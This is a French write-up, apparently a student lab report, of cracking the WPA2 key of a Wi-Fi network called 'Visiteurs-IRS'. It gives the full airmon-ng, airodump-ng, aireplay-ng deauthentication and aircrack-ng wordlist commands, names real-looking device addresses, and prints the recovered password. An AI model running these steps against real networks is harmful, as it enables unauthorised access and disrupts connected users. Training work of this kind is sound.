Kali outil utilisé

Cible identifiée

• SSID : Visiteurs-IRS
• BSSID : 70:F3:5A:27:95:30
• Canal : 1
• Chiffrement : WPA2 CCMP PSK
• Puissance : -46 dBm (signal fort, proximité immédiate)
• WPS : activé (avec Fern)
• Client connecté : 2A:B7:E8:82:79:BE

Phase 1 — Préparation de l'interface

airmon-ng check kill
airmon-ng start wlan0mon
iwconfig wlan0mon

Résultat : wlan0mon en Mode Monitor, fréquence 2.442 GHz (canal 6 par défaut, reconfiguré ensuite sur canal 1).

Phase 2 — Scan des réseaux

airodump-ng a détecté 235 AP au total dans l'environnement (visible dans Fern). Le scan a permis d'identifier Visiteurs-IRS parmi d'autres réseaux présents (StJoCampus, StJoLaSalle, StJoProf, Freebox, SNIR_cyber, MC…).

Phase 3 — Ciblage et capture du trafic

sudo airodump-ng -c 1 --bssid 70:F3:5A:27:95:30 -w capture_wifi wlan0mon

Fichier créé : capture_wifi-02.cap — 3061 paquets capturés. Le client 2A:B7:E8:82:79:BE est visible avec 7449 frames et des trames EAPOL (échanges du handshake).

Phase 4 — Déauthentification

sudo aireplay-ng --deauth 10 -a 70:F3:5A:27:95:30 -c 2A:B7:E8:82:79:BE wlan0mon

10 paquets DeAuth dirigés envoyés au client 2A:B7:E8:82:79:BE entre 09:00:26 et 09:00:31. Le client a été forcé à se reconnecter, déclenchant l'échange du handshake WPA2.

Phase 5 — Validation du handshake

sudo aircrack-ng capture_wifi-02.cap

Résultat : WPA (1 handshake) confirmé pour Visiteurs-IRS / 70:F3:5A:27:95:30. Le fichier .cap est valide et exploitable.

Phase 6 — Craquage du mot de passe

Tentative 1 — rockyou.txt (14 344 391 entrées) :

• Vitesse : 3230 k/s
• Temps estimé : 1h12 — mot de passe non trouvé dans rockyou (gros fichier avec 14 millions de mot de passe)

Tentative 2 — wordlistperso.txt (liste personnalisée) :

sudo aircrack-ng capture_wifi-02.cap -w /home/kali/Desktop/wordlistperso.txt

• 7/16 clés testées en moins d'une seconde
• KEY FOUND! [ stjolorient ]